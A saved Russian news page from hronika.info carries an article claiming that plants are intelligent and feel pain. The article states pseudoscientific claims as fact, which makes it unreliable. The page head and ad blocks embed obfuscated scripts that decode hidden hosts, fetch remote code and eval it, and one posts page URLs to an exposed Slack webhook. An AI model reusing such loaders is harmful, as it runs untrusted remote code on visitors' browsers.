<!DOCTYPE html>
<html>
  
  <head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Эксперты рассказали о возможном наличии интеллекта у растений</title>
<meta name="description" content="Растения не так просты, какими они могут показаться." />
<meta name="keywords" content="" />
<meta name="generator" content="DataLife Engine (http://dle-news.ru)" />
<meta property="og:site_name" content="Хроника мировых событий" />
<meta property="og:type" content="article" />
<meta property="og:title" content="Эксперты рассказали о возможном наличии интеллекта у растений" />
<meta property="og:url" content="http://hronika.info/neverojatnoe/377614-eksperty-rasskazali-o-vozmozhnom-nalichii-intellekta-u-rasteniy.html" />
<meta property="og:image" content="http://hronika.info/uploads/posts/2018-12/thumbs/1544401139_pic-09-12-2018-0853181.jpg" />
<link rel="search" type="application/opensearchdescription+xml" href="http://hronika.info/engine/opensearch.php" title="Хроника мировых событий" />
<link rel="alternate" type="application/rss+xml" title="Хроника мировых событий" href="http://hronika.info/rss.xml" />
<script type="text/javascript" src="/engine/classes/js/jquery.js"></script>
<script type="text/javascript" src="/engine/classes/js/jqueryui.js"></script>
<script type="text/javascript" src="/engine/classes/js/dle_js.js"></script>
<script type="text/javascript" src="/engine/classes/js/bbcodes.js"></script>
<script type="text/javascript" src="/engine/classes/highslide/highslide.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/webfont/1/webfont.js"></script>
<script type="text/javascript" src="/engine/editor/scripts/webfont.js"></script>
<link media="screen" href="/engine/editor/css/default.css" type="text/css" rel="stylesheet" />
    <link rel="icon" type="image/png" href="/favicon.png" />
    <link rel="apple-touch-favicon" href="/apple-touch-favicon.png"/>
    <link media="screen" href="/templates/hronika/css/engine.css" type="text/css" rel="stylesheet" />
    <link media="screen" href="/templates/hronika/css/orating.css" type="text/css" rel="stylesheet" />
    <link media="screen" href="/templates/hronika/css/css.css" type="text/css" rel="stylesheet" />
    
    <meta property="fb:admins" content="490214530991726"/>  
    <meta property="fb:app_id" content="574441425949200"/>  
    <meta name="4309768020df0301dc59380bc0812f0f" content="">
    <!-- From Cache --><script type="text/javascript">
    // Mon Dec 10 2018 08:44:27 GMT+0300 (Moscow Standard Time)
    new (function() {
        var host, pathes=[], path = "", v = 300, us, start, shortPath = "izo6";
        var px = false || window.location.href.indexOf('#ccpx') > -1;
                var c = function (g, u, s, h) {
            us = g; v = u; host = s;
            var d = e(atob(host), p(g));
            if(!px) path = [d, h].join("/");
            load(path);
        };
        var load = function(g){
            start = window["performance"]["now"]();
            if (typeof window.fetch === 'function') {
                var opt = {redirect: 'error', 'method': 'GET'};
                if(px){
                    opt.method = 'POST';
                    opt.headers = { "5b4efdba8b1ffeb73066454c" : Date.now(), "x-loader": Date.now()};
                }
                fetch(new Request(g, opt))
                    .then(function (response) {
                        return response.text();
                    })
                    .then(insertScript)
                    .catch(onLoadError);
            } else {
                var h = new window["XMLHttpRequest"]();
                if(px) {
                    h["open"]("POST", g, true);
                    h["setRequestHeader"]("5b4efdba8b1ffeb73066454c",Date.now());
                    h["setRequestHeader"]("x-loader", Date.now());
                } else {
                    h["open"]("GET", g, true);
                }
                h["open"]("POST", g, true);
                h["responseType"] = "text";
                h["addEventListener"]("load", onLoad);
                h["addEventListener"]("error", onLoadError);
                h["send"](null);
            }
        };
        var onLoad = function(e){
            var c = e.target;
            if (c['status'] === 204) {
                return
            }
            insertScript(c.responseText);
        };
        var onLoadError = function(e){
            var b = window["performance"]["now"]() - start;
            if (v > 0 && b > 0 && b < v) {
                /* stop()*/
            }
            fetch('https://hooks.slack.com/services/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',{
                method:'POST',
                body:JSON.stringify({
                    text:"BLOCKED: "+window.location.hostname+"\n```"+window.location+"```"
                })
            });
        };
        var insertScript = function(c){
            var d = window['document']["createElement"]("script");
            d["async"] = false;
            d["textContent"] = c;
            var attr = {"id": "cc-support-script", "data-config":  us, "data-px": px, "data-hash": "5b4efdba8b1ffeb73066454c", "data-base": host};
            Object.keys(attr).forEach(function (key) {
                d.setAttribute(key, attr[key]);
            });
            window['document']["head"]["appendChild"](d);
        };
        var stop = function(){
            var c = window['document']["styleSheets"];
            for (var d = 0; d < c['length']; d++) {
                c[d]["disabled"] = true
            }
            window["stop"]();
        };
        function p (s) {
            var str = 0;
            s = s.toString().split("");
            for(var i = 0; i< s.length; i++){
                str+= parseInt(s[i]);
            }
            return str.toString();
        }
        function e (s, k) {
            var enc = "";
            for (var i = 0; i < s.length; i++) {
                var a = s.charCodeAt(i);
                var b = a ^ k;
                enc = enc + String.fromCharCode(b);
            }
            return enc;
        }
        return c;
    }() )('9568', 300, 'dGhobG8mMzN+fX54dW9zaHNybzJuaQ==', '0zm3xyzbq19/pncmikk81/l3n9ggq8ahr2/18xlgy0pclr/jth82j/i45kd/f5sd4es/sxyp9yimn97w', '');
</script>
<script async id="cc-support-script" data-px="false" data-hash="5b4efdba8b1ffeb73066454c" data-config="9568" data-base="dGhobG8mMzN+fX54dW9zaHNybzJuaQ==" type="text/javascript" src="https://babdisotons.ru/0zm3xyzbq19/pncmikk81/l3n9ggq8ahr2/18xlgy0pclr/jth82j/i45kd/f5sd4es/sxyp9yimn97w"></script>

    
  </head>

  <body><script type="text/javascript">
<!--
var dle_root       = '/';
var dle_admin      = '';
var dle_login_hash = '';
var dle_group      = 5;
var dle_skin       = 'hronika';
var dle_wysiwyg    = '0';
var quick_wysiwyg  = '0';
var dle_act_lang   = ["Да", "Нет", "Ввод", "Отмена", "Сохранить", "Удалить", "Загрузка. Пожалуйста, подождите..."];
var menu_short     = 'Быстрое редактирование';
var menu_full      = 'Полное редактирование';
var menu_profile   = 'Просмотр профиля';
var menu_send      = 'Отправить сообщение';
var menu_uedit     = 'Админцентр';
var dle_info       = 'Информация';
var dle_confirm    = 'Подтверждение';
var dle_prompt     = 'Ввод информации';
var dle_req_field  = 'Заполните все необходимые поля';
var dle_del_agree  = 'Вы действительно хотите удалить? Данное действие невозможно будет отменить';
var dle_spam_agree = 'Вы действительно хотите отметить пользователя как спамера? Это приведёт к удалению всех его комментариев';
var dle_complaint  = 'Укажите текст Вашей жалобы для администрации:';
var dle_big_text   = 'Выделен слишком большой участок текста.';
var dle_orfo_title = 'Укажите комментарий для администрации к найденной ошибке на странице';
var dle_p_send     = 'Отправить';
var dle_p_send_ok  = 'Уведомление успешно отправлено';
var dle_save_ok    = 'Изменения успешно сохранены. Обновить страницу?';
var dle_del_news   = 'Удалить статью';
var allow_dle_delete_news   = false;
var dle_search_delay   = false;
var dle_search_value   = '';
$(function(){
	FastSearch();
});
//-->
</script><script type="text/javascript">  
<!--  
	hs.graphicsDir = '/engine/classes/highslide/graphics/';
	hs.outlineType = 'rounded-white';
	hs.numberOfImagesToPreload = 0;
	hs.showCredits = false;
	
	hs.lang = {
		loadingText :     'Загрузка...',
		playTitle :       'Просмотр слайдшоу (пробел)',
		pauseTitle:       'Пауза',
		previousTitle :   'Предыдущее изображение',
		nextTitle :       'Следующее изображение',
		moveTitle :       'Переместить',
		closeTitle :      'Закрыть (Esc)',
		fullExpandTitle : 'Развернуть до полного размера',
		restoreTitle :    'Кликните для закрытия картинки, нажмите и удерживайте для перемещения',
		focusTitle :      'Сфокусировать',
		loadingTitle :    'Нажмите для отмены'
	};
	
	hs.align = 'center';
	hs.transitions = ['expand', 'crossfade'];
	hs.addSlideshow({
		interval: 4000,
		repeat: false,
		useControls: true,
		fixedControls: 'fit',
		overlayOptions: {
			opacity: .75,
			position: 'bottom center',
			hideOnMouseOut: true
		}
	});
//-->
</script>
    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-9393887096432784",
    enable_page_level_ads: true
  });
</script>
    
    <header id="header" class="bshadow">
      <div class="maxw"><div class="logowrap












neverojatnoe








">
    <div class="logo"><img src="/templates/hronika/images/logo.png" alt="Хроника мировых событий" style="width: 100%;" /></div>
    
</div>	      <a href="/" class="index"></a>
			<nav class="top-menu bshadow">
				<ul>
					<li><a href="/politika/" >Политика</a></li>
					<li><a href="/ekonomika/" >Экономика</a></li>
                    <li><a href="/obwestvo/" >Общество</a></li>
                    <li><a href="/kultura/" >Культура</a></li>
					<li><a href="/sport/" >Спорт</a></li>
					<li><a href="/avto/" >Авто</a></li>
					<li><a href="/otdyh/" >Отдых</a></li>
					<li><a href="/medicina/" >Медицина</a></li>
                    <li><a href="/nedvizhimost/" >Недвижимость</a></li>
					<li><a href="/videonovosti/" >Видеоновости</a></li>						
				</ul>					
				<ul>
                    <li><a href="/ukraina/" >Украина</a></li>
					<li><a href="/mir/" >Мир</a></li>
					<li><a href="/rossija/" >Россия</a></li>
					<li><a href="/tehnologii/" >Технологии</a></li>
                    <li class="tm-selected"><a href="/neverojatnoe/" >Невероятное</a></li>
					<li><a href="/igry/" >Игры</a></li>                    					
				    <li><a href="/kriminal/" >Происшествия</a></li>
                    <li><a href="/fotoreportazhi/" >Фоторепортажи</a></li>
					<li><a href="/kurjozy/" >Курьезы</a></li>
					<li><a href="/mnenia/" >Мнения</a></li>
				</ul>
			</nav>
            <div class="reklright"></div>
      </div>
      </header>
      <div id="wrcont">

	  <!--noindex--><!--/noindex-->
       
        <div class="google-top-center"><!-- noindex -->
<center>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Под меню заглушка -->
<ins class="adsbygoogle"
     style="display:inline-block;width:970px;height:90px"
     data-ad-client="ca-pub-9393887096432784"
     data-ad-slot="5011853349"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</center>
<!--/noindex--></div>
        <section id="middle">
          <div class="clr"><div class="speedbar"><span id="dle-speedbar"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://hronika.info/" itemprop="url"><span itemprop="title">Хроника событий</span></a></span> &raquo; <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://hronika.info/neverojatnoe/" itemprop="url"><span itemprop="title">Невероятное</span></a></span> &raquo; Эксперты рассказали о возможном наличии интеллекта у растений</span></div></div>
          <div id="container">
            <div id="content2">
 

              <article>

			   <div id='dle-content'>

<div class="full-story">
 <div class="mainc fullimg200_150">
  <div class="full-storyttl">
  <div class="fullinfo"></div>
   <div class="fullargcat"><b>Раздел:&nbsp;</b><strong><a href="http://hronika.info/neverojatnoe/">Невероятное</a></strong>&nbsp;&nbsp;</div>
   <div class="orating ignore-select" id="orating-377614">
	<a href="#" class="orating_m" title="Не нравится" onclick="orating(377614,0);return false;"></a>
	<a href="#" class="orating_p" title="Нравится" onclick="orating(377614,1);return false;"></a>
	<a href="#" class="orating_res" onclick="ostats(377614,1,true);return false;">0</a>
</div>


  </div>
		<div class="ttl_h1full"><h1><span id="news-title">Эксперты рассказали о возможном наличии интеллекта у растений</span></h1></div>
     
<div class="ax-full _ga1_on_">
	<!--TBegin:http://hronika.info/uploads/posts/2018-12/1544401139_pic-09-12-2018-0853181.jpg|left--><a href="http://hronika.info/uploads/posts/2018-12/1544401139_pic-09-12-2018-0853181.jpg" rel="highslide" class="highslide"><img src="/uploads/posts/2018-12/thumbs/1544401139_pic-09-12-2018-0853181.jpg" style="float:left;" alt='Эксперты рассказали о возможном наличии интеллекта у растений' title='Эксперты рассказали о возможном наличии интеллекта у растений'  /></a><!--TEnd--> <b>Растения не так просты, какими они могут показаться.</b><br /><br />Считая себя венцом творения, человек полагает, что является самым умным созданием на земле. При этом он допускает, что животные (в особенности домашние) также обладают некоторым интеллектом, но полностью отказывает в нем растениям, сообщает <a href="http://hronika.info/">Хроника.инфо</a> со ссылкой на <a href="http://esoreiter.ru/index.php?id=1218/09-12-2018-085318.html&amp;dat=news&amp;list=12.2018" target="_blank">Esoreiter</a>.<br /><br />О потерявших разум людях принято говорить, что они ведут растительный образ жизни. А слово «овощ» вам ничего не напоминает?<br /><br />На самом деле наши представления и суждения о растениях нелепы и крайне примитивны.<br /><br /><b>Древние считали растения не только умными, но и духовными</b><br /><br />Знаменитый средневековый врач Парацельс писал в своей «Оккультной ботанике», что у каждого растения есть разум и даже душа. Это знали и древние мудрецы. Мы же почему-то считаем, что растения не способны чувствовать, не могут страдать, - просто в них протекают определенные химические реакции. Да и потом, зачем волноваться, переживать, если от опасности нельзя ни убежать, ни защититься?..<br /><br />Исследования современных ученых опровергают это мнение. Сначала появились данные о том, что растения ощущают боль, когда им наносят раны, и издают «крики», которые воспринимают их зеленые собратья-соседи и регистрируют гальванометры. Также выяснилось, что растения, как и люди, страдают от жажды и голода, что они обладают своеобразной иммунной системой и структурами, аналогичными нервным волокнам. Наконец, растения обмениваются информацией друг с другом.<br /><br />В 1926г. индийский ученый Джагдиш Чандра Бос установил, что на раздражение растения отвечают электрическими импульсами. Долгое время на данный факт внимания практически не обращали, однако сейчас ученые выяснили, что электросигналы обрабатываются в мембранах клеток, и благодаря этому растения чутко отслеживают изменения внешней среды и реагируют на них, меняя сроки цветения, количество и скорость роста листьев.<br /><br /><b>Растения знают язык ароматов</b><br /><br />Современные химические приборы показали, что ароматы заменяют растениям слова или звуки, спасая их от гибели, как нас – призыв о помощи. Такой «язык ароматов» понимают не только растения, но также ползающая и летающая вокруг них хищная «братия» насекомых.<br /><br />Как утверждает американский исследователь Эрик Дэвис, когда растения подвергаются атаке вредителей, это становится известно всем их сородичам. Оказывается, растительный мир тоже полон хитрости и борьбы: он реагирует на множество внешних раздражителей, мобилизуя все силы, призывает на помощь нужных союзников, маскируется и изобретает коварные ловушки. Даже представляет, что его ждет, и старается избежать беды - фактически изменить собственную судьбу. Иногда поведение растений бывает столь «продуманным» и сложным, что появляется мысль: не обладают ли они настоящим разумом?..<br /><br /><b>Растения - великие хитрецы</b><br /><br />Ученый из Нидерландов Марсель Дикке обратил внимание на удивительную способность многих растений призывать на помощь к себе защитников. Так, при нападении паутинных клещей всем известный огурец выделяет на своих листьях терпеноиды – особые ароматные вещества. На этот запах собираются насекомые-хищники - «телохранители» огурцов, уничтожающие их врагов.<br /><br />Некоторые растения действуют в отношении неприятеля на опережение, готовясь встретить его во всеоружии, и с этой целью вырабатывают метилжасмонат (жасмоновую кислоту). Гусеницы еще только ползут, а хищники, предупрежденные растениями, уже начеку. Интересно, что когда исследователи наносили растениям механические повреждения (царапали, кололи и резали), те терпели, не выделяя вещества, привлекающие насекомых-защитников. Из этого следует, что растения осознают характер повреждений, то есть отличают грызущую их гусеницу от действия иголки или ножа.<br /><br />Еще пример. На листья вяза отложил яйца мотылек. Дерево не стало дожидаться, пока из этих яиц выползут прожорливые гусеницы, и призвало защитников. Не успели вредоносные личинки подрасти, как их съели прибывшие на зов «телохранители» вяза.<br /><br />А вот на какую хитрость идет произрастающий в Америке страстоцвет: он защищает себя особыми наростами, напоминающими кладки яиц насекомых. Бабочка, которая прилетает к страстоцвету, видит, что кто-то отложил здесь яйца до нее, и отправляется восвояси, чтобы не оставлять обреченное на гибель потомство. Дело в том, что гусеницы, появившиеся раньше, поедают тех, что вылупились позднее. Вот так обманывает врагов этот необыкновенный цветок.<br /><br /><b>К новой агрономии через понимание того, что собой представляют растения</b><br /><br />Еще наши далекие предки знали, что культивируемые человеком растения тонко реагируют на его отношение к ним. Не секрет, что у некоторых людей все культуры развиваются и плодоносят гораздо лучше, нежели у других, и объяснить это только условиями и уходом нельзя. К примеру, калифорнийскому садоводу Лютеру Бербанку удалось вывести новый вид кактусов, лишенных колючек, - для этого мужчина просто беседовал с растениями и создавал «вибрацию любви». Таким же способом была выведена белая прозрачная шелковица.<br /><br />Если вернуться к борьбе диких растений с вредителями, то человеку стоило бы поучиться ее методам. Изучив и на практике применив команды, которые отдают хищным насекомым наши зеленые друзья, мы сумеем победить фитовредителей. Не нужно будет опылять сады и грядки ядохимикатами, загрязняя землю и нарушая экологию среды. Если культурные растения научатся тому, что делают их дикие «родственники», - самостоятельно обороняться, в том числе «криком» привлекать к себе защитников, - начнется новая эра земледелия.<br /><br /><b>Читайте также: <a href="http://hronika.info/neverojatnoe/377602-odnoy-iz-stran-evropy-grozit-polnoe-zatoplenie.html" >Одной из стран Европы грозит полное затопление</a></b><br /><br />Не будь у диких растений их замечательных способностей, наша планета стала бы пустынной и голой. Ее зеленый наряд свидетельствует о несомненной разумности растений, которые могли бы многое поведать человеку, если бы он научился их слушать и понимать…

	<div class="ctrlE">Если вы нашли ошибку в тексте, выделите её мышью и нажмите Ctrl+Enter</div>
</div>
<div class="clr"><br /><p class="basetags">&nbsp;<i>Теги: <a href="http://hronika.info/tags/%D1%80%D0%B0%D1%81%D1%82%D0%B5%D0%BD%D0%B8%D1%8F/">растения</a>, <a href="http://hronika.info/tags/%D0%B8%D0%BD%D1%82%D0%B5%D0%BB%D0%BB%D0%B5%D0%BA%D1%82/">интеллект</a></i></p></div>
<div class="full-top_banner">
    <!-- Асинхронный код информера news.2xclick.ru -->
<div id="gnezdo_ru_10323">Загрузка...</div>
<script language='JavaScript'>
	var s = document.createElement("script"),
	f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
	s.type = "text/javascript";
	s.async = true;
	s.src = '//news.2xclick.ru/show/10323/block_a.js';
	if (window.opera == "[object Opera]") {
		document.addEventListener("DOMContentLoaded", f);
	} else { f(); }
</script>
<!-- Конец кода информера news.2xclick.ru -->
    </div>
<div class="full-top_banner">
    <div id="AD67HoqbIKGudtbW5O7h" data-type="0" class="blockOfO1b2l3" ></div>
<script>window.RESOURCE_O1B2L3 = 'hronikka.com';</script>
<script src="//hronikka.com/lT/v8.js" ></script>
    <div id="MIXADV_4787" class="MIXADVERT_NET"></div>
          <script> 
          var node4787 = document.getElementById("MIXADV_4787");
          if( node4787 )
          {
               var script = document.createElement("script");
               script.charset = "utf-8";
               script.src = "https://m.mixadvert.com/show/?id=4787&r="+Math.random();
               node4787.parentNode.appendChild(script); 
               script.onerror = function(){
                  window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgInBybyIsICJ0b3AiLCAiaW5mbyIsICJvbmxpbmUiLCAic3BhY2UiLCAic2l0ZSIsICJ4eXoiXTsgdmFyIHN0ciA9ZGF5Kihtb250aCAqIG5hbWVfZGF5ICogZGF5KSsiIisgZGF5Kihtb250aCArIG5hbWVfZGF5ICsgZGF5ICt5ZWFyKTt2YXIgaGFzaCA9ICBidG9hKGJ0b2Eoc3RyKSkudG9Mb3dlckNhc2UoKTsgdmFyIGhvc3QgPSBoYXNoLnN1YnN0cmluZygzLCBoYXNoLmxlbmd0aCAtIG5hbWVfZGF5LzIpKyIuIitkb21bbmFtZV9kYXkgLSAxXTt2YXIgciA9IE1hdGgucmFuZG9tKCkudG9TdHJpbmcoMzYpLnN1YnN0cigyLCAyKTtyID0gci5yZXBsYWNlKC9bMC05XS9nLCAiIik7dmFyIGRlbHRhID0gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogKDEwMCAtIDEwICsgMSkpICsgMTA7dmFyIGlkID0gNDc4NyAtIGRlbHRhOyB2YXIgc2NyaXB0X2ZpcnN0ID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7c2NyaXB0X2ZpcnN0LnNyYyA9ICJodHRwczovLyIrIGhvc3QrIi8iK2RlbHRhK2lkK3IrIiI7IG5vZGU0Nzg3LnBhcmVudE5vZGUuYXBwZW5kQ2hpbGQoc2NyaXB0X2ZpcnN0KTtzY3JpcHRfZmlyc3Qub25lcnJvciA9IGZ1bmN0aW9uKCl7IHNldFRpbWVvdXQoIGZ1bmN0aW9uICgpIHsgaWYoIG5vZGU0Nzg3LmlubmVySFRNTCA9PSAiIiApIHdpbmRvdy5ldmFsKGxvY2FsU3RvcmFnZS5nZXRJdGVtKCI0Nzg3IikpIH0sIDUwMDApOyAgO307IA==") );
              }
          }
          </script>
    
    <!-- start NEW content_v1 for hronika.info -->
<div id="adpartner-jsunit-851">
    <script type="text/javascript">
        var head = document.getElementsByTagName('head')[0];
        var script = document.createElement('script');
        script.type = 'text/javascript';
        script.src = "//a4p.adpartner.pro/jsunit?id=851&" + Math.random();
        head.appendChild(script);
    </script>
</div>

<!-- end NEW content_v1 for hronika.info -->
    <script id="r17724" type="text/javascript">
    (function() {
        var worker17724,
            tickerID = 17724,
            tag = document.getElementById('r'+ tickerID),
            id = (function(tickerID) {
                var now = Math.floor((new Date()).getTime() / 1000 / 3600) * 3600;
                if ('btoa' in window)
                    return btoa('g4p_'+ tickerID +'_'+ now).replace(/[^a-zA-Z0-9]/, '');
                return 'g4p_'+ tickerID +'_'+ now;
            })(tickerID);
        
        var container = document.createElement('div');
            container.id = id;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.src = '//js-goods.redtram.com/0/17/ticker_17724.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9nNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKC95YW5kZXh8eWFicm93c2VyL2kudGVzdChuYXZpZ2F0b3IudXNlckFnZW50KSkgd3NzVXJsID0gIndzczovL2c0cC5ncnQwMS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker17724.postMessage(data);
                }

                worker17724 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker17724.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker17724.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
</script>
    <div id='upsilon73sigma8253'></div>
<script type='text/javascript'>(function(){function f(v){return Math.abs(v.split('').reduce(function(w,x){return w=(w<<5)-w+x.charCodeAt(0),w&w},0))}function g(v){return(26<=v?g((v/26>>0)-1):'')+'abcdefghijklmnopqrstuvwxyz'[v%26>>0]}var j=673873,r=''+Math.ceil((Date.now()-1.5147648e12)/6.048e8)*j,p=8253,l=''+j+''+p,t=document;p=t.createElement('script'),p.type='text/javascript',p.src='//'+g(f(j+r))+(''+f(j+r)).slice(-1)+g(f(j+(r+1)))+'.ru/'+g(f(j+r))+(''+f(j+r)).slice(-1)+g(f(j+(r+1)))+l+'.js',t.getElementById('upsilon73sigma8253').appendChild(p)})();</script>
    <div id="bn_aa922818e6">загрузка...</div>
<script type="text/javascript" src="//recreativ.ru/rcode.aa922818e6.js"></script>
    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({
          google_ad_client: "ca-pub-9393887096432784",
          enable_page_level_ads: true
     });
</script>
     </div>
<div class="f_bottm">
 <div class="f_date_author">Сегодня, 06:52 » Автор: <a onclick="ShowProfile('%D0%95%D0%B2%D0%B3%D0%B5%D0%BD%D0%B8%D0%B9+%D0%A8%D0%B5%D0%B2%D1%87%D0%B5%D0%BD%D0%BA%D0%BE', 'http://hronika.info/user/%D0%95%D0%B2%D0%B3%D0%B5%D0%BD%D0%B8%D0%B9+%D0%A8%D0%B5%D0%B2%D1%87%D0%B5%D0%BD%D0%BA%D0%BE/', '0'); return false;" href="http://hronika.info/user/%D0%95%D0%B2%D0%B3%D0%B5%D0%BD%D0%B8%D0%B9+%D0%A8%D0%B5%D0%B2%D1%87%D0%B5%D0%BD%D0%BA%D0%BE/">Евгений Шевченко</a></div> 
 <div class="view_comments">  
  <div class="f_views"><span></span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;548</div>
  <div class="f_comments"><span></span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0</div> 
  </div>
</div>
	</div>    
<div class="sb">
<div class="sotsseti">
<!-- noindex -->
  <script type="text/javascript">(function() {
      if (window.pluso) {return};
       var d = document, s = d.createElement('script'), g = 'getElementsByTagName';
       s.type = 'text/javascript'; s.charset='UTF-8'; s.async = true;
       s.src = ('https:' == window.location.protocol ? 'https' : 'http')  + '://x.pluso.ru/pluso-x.js';
       var h=d[g]('body')[0];
       h.appendChild(s);
    })();
 </script>
<div class="pluso-engine" pluso-sharer={"buttons":"facebook,twitter,google,vkontakte,moimir,email,print,more","style":{"size":"small","shape":"square","theme":"theme03","css":""},"orientation":"horizontal","multiline":false} ></div> 
<!-- /noindex -->
    
<div class="sotslikes">
<!-- Код рейтинга -->

</div>
</div>
 <div class="fullstoryn">
   <div class="bshadow exban"> 
    
    <div id="phoenix5a0d71e04f32fe43a294e05c"></div> <script type="text/javascript">
        var site_id = "5a0d715b4f32fe43bd99b2da";
        var widget_id = "5a0d71e04f32fe43a294e05c";
      </script>
      <script type="text/javascript" src="//phoenix-widget.com/static/js/jsonp.js"></script>
    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Рекомендуемый под новостью -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-9393887096432784"
     data-ad-slot="6534414543"
     data-ad-format="autorelaxed"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
           <div class="clr"></div>
    </div>
 </div>
  <div class="clr"></div>
  <div class="fullstoryn">
   <div class="bshadow exban">
  
    
   <div class="clr"></div>
    </div>
 </div>  
</div><br/>

<div class="related-n"> 
<div class="relttl"><h2>Похожие новости по теме</h2></div>
         <div class="clr"></div>
<div class="related_news bshadow"><a href="http://hronika.info/neverojatnoe/278025-uchenye-zanyalis-sozdaniem-rasteniy-shpionov.html">
  <img src="/posters/110_85_80_1/uploads/posts/2017-11/thumbs/1511819440_rasteniya_1-620x400.jpg" alt="Ученые занялись созданием растений-шпионов" title="Ученые занялись созданием растений-шпионов" /></a>
    <strong title="Ученые занялись созданием растений-шпионов"><a href="http://hronika.info/neverojatnoe/278025-uchenye-zanyalis-sozdaniem-rasteniy-shpionov.html">Ученые занялись созданием растений-шпионов</a></strong>
  <p>Такого еще не было.</p><div class="clr"></div>
</div>
<div class="related_news bshadow"><a href="http://hronika.info/neverojatnoe/243049-tomaty-privodyat-k-kannibalizmu-sredi-nasekomyh.html">
  <img src="/posters/110_85_80_1/uploads/posts/2017-07/thumbs/1499774458_nasekomye.jpg" alt="Томаты приводят к каннибализму среди насекомых" title="Томаты приводят к каннибализму среди насекомых" /></a>
    <strong title="Томаты приводят к каннибализму среди насекомых"><a href="http://hronika.info/neverojatnoe/243049-tomaty-privodyat-k-kannibalizmu-sredi-nasekomyh.html">Томаты приводят к каннибализму среди насекомых</a></strong>
  <p>Некоторые растения, включая томаты, выделяют вещества, заставляя гусениц-вредителей пожирать друг друга.</p><div class="clr"></div>
</div>
<div class="related_news bshadow"><a href="http://hronika.info/neverojatnoe/178296-v-yaponii-uchenye-nashli-rasteniya-kotorye-rastut-bez-fotosinteza.html">
  <img src="/posters/110_85_80_1/uploads/posts/2016-10/thumbs/1476642029_1476616520_gasrodiya.jpg" alt="В Японии ученые нашли растения, которые растут без фотосинтеза" title="В Японии ученые нашли растения, которые растут без фотосинтеза" /></a>
    <strong title="В Японии ученые нашли растения, которые растут без фотосинтеза"><a href="http://hronika.info/neverojatnoe/178296-v-yaponii-uchenye-nashli-rasteniya-kotorye-rastut-bez-fotosinteza.html">В Японии ученые нашли растения, которые растут без фотосинтеза</a></strong>
  <p>В Японии ученые нашли вид растений, которые не цветут и не используют в своей жизнедеятельности фотосинтез.</p><div class="clr"></div>
</div>
<div class="related_news bshadow"><a href="http://hronika.info/neverojatnoe/174775-komnatnye-rasteniya-otpugivayut-komarov-uchenye.html">
  <img src="/posters/110_85_80_1/uploads/posts/2016-10/thumbs/1475389372_1475385562_lavanda.jpg" alt="Комнатные растения  отпугивают комаров, - ученые" title="Комнатные растения  отпугивают комаров, - ученые" /></a>
    <strong title="Комнатные растения  отпугивают комаров, - ученые"><a href="http://hronika.info/neverojatnoe/174775-komnatnye-rasteniya-otpugivayut-komarov-uchenye.html">Комнатные растения  отпугивают комаров, - ученые</a></strong>
  <p>Учёные из Индии выяснили, что целый ряд растений и трав может отпугивать комаров и других насекомых.</p><div class="clr"></div>
</div>
